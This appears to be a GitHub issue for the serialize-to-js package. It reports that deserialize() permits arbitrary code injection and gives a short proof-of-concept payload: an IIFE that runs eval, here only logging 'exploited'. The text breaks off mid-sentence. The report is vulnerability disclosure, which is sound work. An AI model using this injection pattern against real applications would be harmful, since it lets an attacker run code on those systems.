deserialize() can be abused to achieve arbitrary code injection with an IIFE · Issue #1 · commenthol/serialize-to-js

var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }" var serialize = require('serialize-to-js'); serialize.deserialize(payload); I don't know if this is a functionality as you ...